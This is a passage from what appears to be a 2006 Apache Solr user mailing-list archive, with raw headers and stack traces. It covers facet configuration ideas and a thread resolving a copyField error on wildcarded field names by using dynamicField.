-- but there's really no way to annotate fields directly. : As for 'scanning the resultset', I can see how I was a little shy on : the details. Sorry about that. I meant look through the results to : see what facets apply to the resultset. So if my company sells books : and power tools, when someone searches for 'the little engine who : could', once we know there are no power tools in the result set, I : don't show the refinement facets for power tool metadata (like Ah... right. Depending on how you go about it, scanning result sets to find out which facets apply is probably just as expensive as just testing the facet to see if hte ocunt is posative -- especially if you have the RAM to allocate a big Filter cache -- then you can have a DocSet for every Filter in memory all of the time, and testing a few thousand can be done near instantly. : In your example file, how does the name facet know to display only : the names that start with whatever intial was selected? Would that Honestly, i haven't really thought about the mechanisms for dealing with facets in that way ... it would be trivial just to let all of the names be tested -- but that would obviously involve a lot of unneccessary computation, so if you could configure subgroups that were only consulted once another facet had been used, that would obviously make more sense. Perhaps something like... <group id="initial" label="Author"> <facet id="a" label="A" query="author:a*"> <group id="name" label="Author"> <facet use-prefix-terms-field="author">a</facet> </group> </facet> <facet id="b" label="B" query="author:b*"> <group id="name" label="Author"> <facet use-prefix-terms-field="author">b</facet> </group> </facet> ... ..allthough obviously common group/subgroup relationships like prefix expansion could be done as a special case to make it shorter to express... <!-- 'mfg' facet starts with initial, then full names that match initial --> <group id="mfg" label="Manufacturer"> <prefix-facet id="initial" field="mfg" prefix-chars="1"> <term-value-facet id="mfg" /> </prefix-facet> </group> <!-- 'name' facet starts with initial, then 2 char prefix, then full names that match prefix --> <group id="name" label="Author"> <prefix-facet id="initial" field="name" prefix-chars="1"> <prefix-facet id="i_prefix" field="name" prefix-chars="2"> <term-value-facet id="name" /> </prefix-facet> </prefix-facet> </group> : I think what I am starting to understand is that coming from what we : have (a rdbms based metadata gathering system), I need to rethink my : process. Ive spent so much time training myself to think in terms of : how to make things fast in mysql that I need to re-open my mind :) yeah ... inverted indexes are a completey different beast from relational databases. i would definitely suggest reading up on lucene, and getting to know the basics -- keeping in mind that anything that can be done in lucene can be done in a solr plugin, solr just makes it easier and gives you "wicked cool" caching :) -Hoss From [email protected] Thu Mar 16 23:12:35 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46454 invoked from network); 16 Mar 2006 23:12:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Mar 2006 23:12:18 -0000 Received: (qmail 41865 invoked by uid 500); 16 Mar 2006 23:12:15 -0000 Delivered-To: [email protected] Received: (qmail 41838 invoked by uid 500); 16 Mar 2006 23:12:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41784 invoked by uid 99); 16 Mar 2006 23:12:14 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 15:12:14 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cn-sfo1-mail-relay2.cnet.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 15:12:13 -0800 Received: from cnet138.cnet.cnwk (cnet138.cnet.cnwk [161.129.204.104]) by cn-sfo1-mail-relay2.cnet.com (8.12.10/8.12.10) with ESMTP id k2GNBq4w002712 for <[email protected]>; Thu, 16 Mar 2006 15:11:52 -0800 (PST) X-Spam-Filter: [email protected] by digitalanswers.org Received: from CNET6.cnet.cnwk ([161.129.204.104]) by cnet138.cnet.cnwk with Microsoft SMTPSVC220.874.0790); Thu, 16 Mar 2006 15:11:51 -0800 x-mimeole: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: bug?: copyField on wildcarded field name Date: Thu, 16 Mar 2006 15:11:51 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: bug?: copyField on wildcarded field name Thread-Index: AcZJTwIXm97dMJmxQgCNh06oe6wAuw== From: "Linda Tan" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 16 Mar 2006 23:11:51.0912 (UTC) FILETIME=[02753E80:01C6494F] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Is this a bug? In my schema.xml: .... <fields> <field name=3D"attr*" type=3D"text" indexed=3D"true" stored=3D"true"/> </fields> <copyField source=3D"attr6" dest=3D"title"/> <copyField source=3D"attr7" dest=3D"keywords"/> .... When I start the server, I get=20 org.apache.solr.core.SolrException: undefined field attr1 Log file snippet follows: 2714 [main] WARN org.mortbay.log - EXCEPTION=20 java.lang.reflect.InvocationTargetException at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.jav a:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessor Impl.java:25) at java.lang.reflect.Method.invoke(Method.java:585) at org.mortbay.xml.XmlConfiguration.call(XmlConfiguration.java:502) at org.mortbay.xml.XmlConfiguration.configure(XmlConfiguration.java:216) at org.mortbay.xml.XmlConfiguration.newInstance(XmlConfiguration.java:178) at org.mortbay.xml.XmlConfiguration.main(XmlConfiguration.java:872) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.jav a:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessor Impl.java:25) at java.lang.reflect.Method.invoke(Method.java:585) at org.mortbay.start.Main.invokeMain(Main.java:149) at org.mortbay.start.Main.start(Main.java:478) at org.mortbay.start.Main.main(Main.java:92) Caused by: org.apache.solr.core.SolrException: undefined field attr1 at org.apache.solr.schema.IndexSchema.getField(Unknown Source) at org.apache.solr.schema.IndexSchema.readConfig(Unknown Source) at org.apache.solr.schema.IndexSchema.<init>(Unknown Source) at org.apache.solr.core.SolrCore.<init>(Unknown Source) at org.apache.solr.core.SolrCore.getSolrCore(Unknown Source) at org.apache.solr.servlet.SolrServlet.init(Unknown Source) at javax.servlet.GenericServlet.init(GenericServlet.java:261) at org.mortbay.jetty.servlet.ServletHolder.initServlet(ServletHolder.java:3 62) at org.mortbay.jetty.servlet.ServletHolder.doStart(ServletHolder.java:219) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37) at org.mortbay.jetty.servlet.ServletHandler.initialize(ServletHandler.java: 565) at org.mortbay.jetty.webapp.WebAppContext.startContext(WebAppContext.java:9 24) at org.mortbay.jetty.handler.ContextHandler.doStart(ContextHandler.java:341 ) at org.mortbay.jetty.webapp.WebAppContext.doStart(WebAppContext.java:330) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37) at org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCollection.ja va:101) at org.mortbay.jetty.Server.doStart(Server.java:235) at org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37) thx, -linda From [email protected] Thu Mar 16 23:29:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54796 invoked from network); 16 Mar 2006 23:29:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Mar 2006 23:29:07 -0000 Received: (qmail 64471 invoked by uid 500); 16 Mar 2006 23:29:02 -0000 Delivered-To: [email protected] Received: (qmail 64420 invoked by uid 500); 16 Mar 2006 23:29:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64411 invoked by uid 99); 16 Mar 2006 23:29:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 15:29:02 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 15:29:01 -0800 Received: by uproxy.gmail.com with SMTP id j40so251386ugd for <[email protected]>; Thu, 16 Mar 2006 15:28:39 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=jAqwWZKAxTDxD/tWfh3qIGLpFAbgpqcIytnMGjt0ENWpefXb4Ij3eI0Wiq6gkhhQuOldboclzXxsfDvR5kLWoWlQdDMM8I3d0dmcUTeO7vwzJiIA2Wscy87+dGJHC48inBCxBk3ig4iF1Uuy5OrTf179sqATzQf9M+L1zUG5dQA= Received: by 161.129.204.104 with SMTP id w8mr1538436ugi; Thu, 16 Mar 2006 15:28:38 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 16 Mar 2006 15:28:38 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 16 Mar 2006 18:28:38 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: bug?: copyField on wildcarded field name In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi Linda, You need to use the <dynamicField> tag when declaring dynamic fields Hmmm, the "Unknown Source" in the stack traces is problematic... it means we built Solr without debugging info. -Yonik On 3/16/06, Linda Tan <[email protected]> wrote: > Is this a bug? In my schema.xml: > > .... > <fields> > <field name=3D"attr*" type=3D"text" indexed=3D"true" stored=3D"true"/> > </fields> > > <copyField source=3D"attr6" dest=3D"title"/> > <copyField source=3D"attr7" dest=3D"keywords"/> > .... > > When I start the server, I get > org.apache.solr.core.SolrException: undefined field attr1 > > > Log file snippet follows: > > 2714 [main] WARN org.mortbay.log - EXCEPTION > java.lang.reflect.InvocationTargetException > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.jav > a:39) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessor > Impl.java:25) > at java.lang.reflect.Method.invoke(Method.java:585) > at > org.mortbay.xml.XmlConfiguration.call(XmlConfiguration.java:502) > at > org.mortbay.xml.XmlConfiguration.configure(XmlConfiguration.java:216) > at > org.mortbay.xml.XmlConfiguration.newInstance(XmlConfiguration.java:178) > at > org.mortbay.xml.XmlConfiguration.main(XmlConfiguration.java:872) > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > at > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.jav > a:39) > at > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessor > Impl.java:25) > at java.lang.reflect.Method.invoke(Method.java:585) > at org.mortbay.start.Main.invokeMain(Main.java:149) > at org.mortbay.start.Main.start(Main.java:478) > at org.mortbay.start.Main.main(Main.java:92) > Caused by: org.apache.solr.core.SolrException: undefined field attr1 > at org.apache.solr.schema.IndexSchema.getField(Unknown Source) > at org.apache.solr.schema.IndexSchema.readConfig(Unknown Source) > at org.apache.solr.schema.IndexSchema.<init>(Unknown Source) > at org.apache.solr.core.SolrCore.<init>(Unknown Source) > at org.apache.solr.core.SolrCore.getSolrCore(Unknown Source) > at org.apache.solr.servlet.SolrServlet.init(Unknown Source) > at javax.servlet.GenericServlet.init(GenericServlet.java:261) > at > org.mortbay.jetty.servlet.ServletHolder.initServlet(ServletHolder.java:3 > 62) > at > org.mortbay.jetty.servlet.ServletHolder.doStart(ServletHolder.java:219) > at > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37) > at > org.mortbay.jetty.servlet.ServletHandler.initialize(ServletHandler.java: > 565) > at > org.mortbay.jetty.webapp.WebAppContext.startContext(WebAppContext.java:9 > 24) > at > org.mortbay.jetty.handler.ContextHandler.doStart(ContextHandler.java:341 > ) > at > org.mortbay.jetty.webapp.WebAppContext.doStart(WebAppContext.java:330) > at > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37) > at > org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCollection.ja > va:101) > at org.mortbay.jetty.Server.doStart(Server.java:235) > at > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37) > > > thx, > > -linda From [email protected] Thu Mar 16 23:34:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57009 invoked from network); 16 Mar 2006 23:34:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Mar 2006 23:34:42 -0000 Received: (qmail 76905 invoked by uid 500); 16 Mar 2006 23:34:39 -0000 Delivered-To: [email protected] Received: (qmail 76889 invoked by uid 500); 16 Mar 2006 23:34:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 76880 invoked by uid 99); 16 Mar 2006 23:34:39 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 15:34:39 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO uproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 15:34:38 -0800 Received: by uproxy.gmail.com with SMTP id j40so251799ugd for <[email protected]>; Thu, 16 Mar 2006 15:34:17 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=iqao0e9FKKsfX7YPsneYKyXQk5KYJZW0HKASH7cFb7cPaXWBZ4w6cADT8lPPKcfHUqJDW7Up5drJiJY3OYvbKfDDptyN7F+eibZecp8F4FWU1Zd+ZOhJjuhFz2HCfIsUm3Hw9ApqssBk/Twg+qZt2DBK1CW3+TVY2Xp/fyS9poM= Received: by 161.129.204.104 with SMTP id y12mr1531319ugi; Thu, 16 Mar 2006 15:34:16 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 16 Mar 2006 15:34:16 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 16 Mar 2006 18:34:16 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: bug?: copyField on wildcarded field name In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Oh, and there is a current limitation that you can't do dynamic copyField statements lilke <copyField source=3D"attr*", etc...> Do you need that? I *think* you should still be able to use specific fields in copyField statements, even when the types of those specific fields are defined by dynamicField. -Yonik On 3/16/06, Yonik Seeley <[email protected]> wrote: > Hi Linda, > > You need to use the <dynamicField> tag when declaring dynamic fields > > Hmmm, the "Unknown Source" in the stack traces is problematic... it > means we built Solr without debugging info. > > -Yonik > > On 3/16/06, Linda Tan <[email protected]> wrote: > > Is this a bug? In my schema.xml: > > > > .... > > <fields> > > <field name=3D"attr*" type=3D"text" indexed=3D"true" stored=3D"true"/> > > </fields> > > > > <copyField source=3D"attr6" dest=3D"title"/> > > <copyField source=3D"attr7" dest=3D"keywords"/> > > .... > > > > When I start the server, I get > > org.apache.solr.core.SolrException: undefined field attr1 > > > > > > Log file snippet follows: > > > > 2714 [main] WARN org.mortbay.log - EXCEPTION > > java.lang.reflect.InvocationTargetException > > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > > at > > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.ja= v > > a:39) > > at > > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccesso= r > > Impl.java:25) > > at java.lang.reflect.Method.invoke(Method.java:585) > > at > > org.mortbay.xml.XmlConfiguration.call(XmlConfiguration.java:502) > > at > > org.mortbay.xml.XmlConfiguration.configure(XmlConfiguration.java:216) > > at > > org.mortbay.xml.XmlConfiguration.newInstance(XmlConfiguration.java:178) > > at > > org.mortbay.xml.XmlConfiguration.main(XmlConfiguration.java:872) > > at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > > at > > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.ja= v > > a:39) > > at > > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccesso= r > > Impl.java:25) > > at java.lang.reflect.Method.invoke(Method.java:585) > > at org.mortbay.start.Main.invokeMain(Main.java:149) > > at org.mortbay.start.Main.start(Main.java:478) > > at org.mortbay.start.Main.main(Main.java:92) > > Caused by: org.apache.solr.core.SolrException: undefined field attr1 > > at org.apache.solr.schema.IndexSchema.getField(Unknown Source) > > at org.apache.solr.schema.IndexSchema.readConfig(Unknown Source= ) > > at org.apache.solr.schema.IndexSchema.<init>(Unknown Source) > > at org.apache.solr.core.SolrCore.<init>(Unknown Source) > > at org.apache.solr.core.SolrCore.getSolrCore(Unknown Source) > > at org.apache.solr.servlet.SolrServlet.init(Unknown Source) > > at javax.servlet.GenericServlet.init(GenericServlet.java:261) > > at > > org.mortbay.jetty.servlet.ServletHolder.initServlet(ServletHolder.java:= 3 > > 62) > > at > > org.mortbay.jetty.servlet.ServletHolder.doStart(ServletHolder.java:219) > > at > > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37= ) > > at > > org.mortbay.jetty.servlet.ServletHandler.initialize(ServletHandler.java= : > > 565) > > at > > org.mortbay.jetty.webapp.WebAppContext.startContext(WebAppContext.java:= 9 > > 24) > > at > > org.mortbay.jetty.handler.ContextHandler.doStart(ContextHandler.java:34= 1 > > ) > > at > > org.mortbay.jetty.webapp.WebAppContext.doStart(WebAppContext.java:330) > > at > > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37= ) > > at > > org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCollection.j= a > > va:101) > > at org.mortbay.jetty.Server.doStart(Server.java:235) > > at > > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycle.java:37= ) > > > > > > thx, > > > > -linda > -- -Yonik http://incubator.apache.org/solr Solr, The Open Source Lucene Search Server From [email protected] Fri Mar 17 00:01:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69718 invoked from network); 17 Mar 2006 00:01:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 17 Mar 2006 00:01:25 -0000 Received: (qmail 17519 invoked by uid 500); 17 Mar 2006 00:01:25 -0000 Delivered-To: [email protected] Received: (qmail 17500 invoked by uid 500); 17 Mar 2006 00:01:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17491 invoked by uid 99); 17 Mar 2006 00:01:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 16:01:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cn-sfo1-mail-relay2.cnet.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Mar 2006 16:01:24 -0800 Received: from cnet139.cnet.cnwk (cnet139.cnet.cnwk [161.129.204.104]) by cn-sfo1-mail-relay2.cnet.com (8.12.10/8.12.10) with ESMTP id k2H0134w004951 for <[email protected]>; Thu, 16 Mar 2006 16:01:03 -0800 (PST) X-Spam-Filter: [email protected] by digitalanswers.org Received: from CNET6.cnet.cnwk ([161.129.204.104]) by cnet139.cnet.cnwk with Microsoft SMTPSVC220.874.0790); Thu, 16 Mar 2006 16:01:03 -0800 x-mimeole: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: bug?: copyField on wildcarded field name Date: Thu, 16 Mar 2006 16:01:02 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: bug?: copyField on wildcarded field name Thread-Index: AcZJUWt0X3jPBCG8Rj27/7vKVHTedgABGSZQ From: "Linda Tan" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 17 Mar 2006 00:01:03.0149 (UTC) FILETIME=[E18845D0:01C64955] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Ah, thanks Yonik.=20 > -----Original Message----- > From: Yonik Seeley [mailto:[email protected]]=20 > Sent: Thursday, March 16, 2006 3:29 PM > To: [email protected] > Subject: Re: bug?: copyField on wildcarded field name >=20 > Hi Linda, >=20 > You need to use the <dynamicField> tag when declaring dynamic fields >=20 > Hmmm, the "Unknown Source" in the stack traces is problematic... it > means we built Solr without debugging info. >=20 > -Yonik >=20 > On 3/16/06, Linda Tan <[email protected]> wrote: > > Is this a bug? In my schema.xml: > > > > .... > > <fields> > > <field name=3D"attr*" type=3D"text" indexed=3D"true" = stored=3D"true"/> > > </fields> > > > > <copyField source=3D"attr6" dest=3D"title"/> > > <copyField source=3D"attr7" dest=3D"keywords"/> > > .... > > > > When I start the server, I get > > org.apache.solr.core.SolrException: undefined field attr1 > > > > > > Log file snippet follows: > > > > 2714 [main] WARN org.mortbay.log - EXCEPTION > > java.lang.reflect.InvocationTargetException > > at=20 > sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > > at > >=20 > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccess > orImpl.jav > > a:39) > > at > >=20 > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMeth > odAccessor > > Impl.java:25) > > at java.lang.reflect.Method.invoke(Method.java:585) > > at > > org.mortbay.xml.XmlConfiguration.call(XmlConfiguration.java:502) > > at > >=20 > org.mortbay.xml.XmlConfiguration.configure(XmlConfiguration.java:216) > > at > >=20 > org.mortbay.xml.XmlConfiguration.newInstance(XmlConfiguration. > java:178) > > at > > org.mortbay.xml.XmlConfiguration.main(XmlConfiguration.java:872) > > at=20 > sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) > > at > >=20 > sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccess > orImpl.jav > > a:39) > > at > >=20 > sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMeth > odAccessor > > Impl.java:25) > > at java.lang.reflect.Method.invoke(Method.java:585) > > at org.mortbay.start.Main.invokeMain(Main.java:149) > > at org.mortbay.start.Main.start(Main.java:478) > > at org.mortbay.start.Main.main(Main.java:92) > > Caused by: org.apache.solr.core.SolrException: undefined field attr1 > > at=20 > org.apache.solr.schema.IndexSchema.getField(Unknown Source) > > at=20 > org.apache.solr.schema.IndexSchema.readConfig(Unknown Source) > > at org.apache.solr.schema.IndexSchema.<init>(Unknown Source) > > at org.apache.solr.core.SolrCore.<init>(Unknown Source) > > at org.apache.solr.core.SolrCore.getSolrCore(Unknown Source) > > at org.apache.solr.servlet.SolrServlet.init(Unknown Source) > > at=20 > javax.servlet.GenericServlet.init(GenericServlet.java:261) > > at > >=20 > org.mortbay.jetty.servlet.ServletHolder.initServlet(ServletHol > der.java:3 > > 62) > > at > >=20 > org.mortbay.jetty.servlet.ServletHolder.doStart(ServletHolder. > java:219) > > at > >=20 > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycl > e.java:37) > > at > >=20 > org.mortbay.jetty.servlet.ServletHandler.initialize(ServletHan > dler.java: > > 565) > > at > >=20 > org.mortbay.jetty.webapp.WebAppContext.startContext(WebAppCont > ext.java:9 > > 24) > > at > >=20 > org.mortbay.jetty.handler.ContextHandler.doStart(ContextHandle > r.java:341 > > ) > > at > >=20 > org.mortbay.jetty.webapp.WebAppContext.doStart(WebAppContext.java:330) > > at > >=20 > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycl > e.java:37) > > at > >=20 > org.mortbay.jetty.handler.HandlerCollection.doStart(HandlerCol > lection.ja > > va:101) > > at org.mortbay.jetty.Server.doStart(Server.java:235) > > at > >=20 > org.mortbay.component.AbstractLifeCycle.start(AbstractLifeCycl > e.java:37) > > > > > > thx, > > > > -linda >=20 From [email protected] Sat Mar 18 00:10:40 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98979 invoked from network); 18 Mar 2006 00:10:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Mar 2006 00:10:39 -0000 Received: (qmail 43299 invoked by uid 500); 18 Mar 2006 00:10:35 -0000 Delivered-To: [email protected] Received: (qmail 43271 invoked by uid 500); 18 Mar 2006 00:10:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43231 invoked by uid 99); 18 Mar 2006 00:10:34 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Mar 2006 16:10:33 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cn-sfo1-mail-relay2.cnet.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 17 Mar 2006 16:10:33 -0800 Received: from cnet138.cnet.cnwk (cnet138.cnet.cnwk [161.129.204.104]) by cn-sfo1-mail-relay2.cnet.com (8.12.10/8.12.10) with ESMTP id k2I0AC4w024781 for <[email protected]>; Fri, 17 Mar 2006 16:10:12 -0800 (PST) X-Spam-Filter: [email protected] by digitalanswers.org Received: from CNET6.cnet.cnwk ([161.129.204.104]) by cnet138.cnet.cnwk with Microsoft SMTPSVC220.874.0790); Fri, 17 Mar 2006 16:10:12 -0800 x-mimeole: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: RE: bug?: copyField on wildcarded field name Date: Fri, 17 Mar 2006 16:10:11 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: bug?: copyField on wildcarded field name Thread-Index: AcZJUjS8FtbCehXSQxyrdIEVrbuy4gAA7wZw From: "Linda Tan" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 18 Mar 2006 00:10:12.0262 (UTC) FILETIME=[533E0460:01C64A20] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi Yonik, > Oh, and there is a current limitation that you can't do dynamic > copyField statements > lilke <copyField source=3D"attr*", etc...> > Do you need that? No, I'm all set, thanks. > I *think* you should still be able to use specific fields in copyField > statements, even when the types of those specific fields are defined > by dynamicField. Yes, I tested it, and if one or both of the source and dest fields are defined in dynamicField, it works as expected.=20 -linda > -----Original Message----- > From: Yonik Seeley [mailto:[email protected]]=20 > Sent: Thursday, March 16, 2006 3:34 PM > To: [email protected] > Subject: Re: bug?: copyField on wildcarded field name >=20 > Oh, and there is a current limitation that you can't do dynamic > copyField statements > lilke <copyField source=3D"attr*", etc...> > Do you need that? >=20 > I *think* you should still be able to use specific fields in copyField > statements, even when the types of those specific fields are defined > by dynamicField. >=20 > -Yonik >=20 >=20 > On 3/16/06, Yonik Seeley <[email protected]> wrote: > > Hi Linda, > > > > You need to use the <dynamicField> tag when declaring dynamic fields > > > > Hmmm, the "Unknown Source" in the stack traces is problematic... it > > means we built Solr without debugging info. > > > > -Yonik > > > > On 3/16/06, Linda Tan <[email protected]> wrote: > > > Is this a bug? In my schema.xml: > > > > > > .... > > > <fields> > > > <field name=3D"attr*" type=3D"text" indexed=3D"true" = stored=3D"true"/> > > > </fields> > > > > > > <copyField source=3D"attr6" dest=3D"title"/> > > > <copyField source=3D"attr7" dest=3D"keywords"/> > > > .... > > > > > > When I start the server, I get > > > org.apache.solr.core.SolrException: undefined field attr1 > > > > > > > > > Log file snippet follows: > > > > > > 2714 [main] WARN org.mortbay.log - EXCEPTION > > > 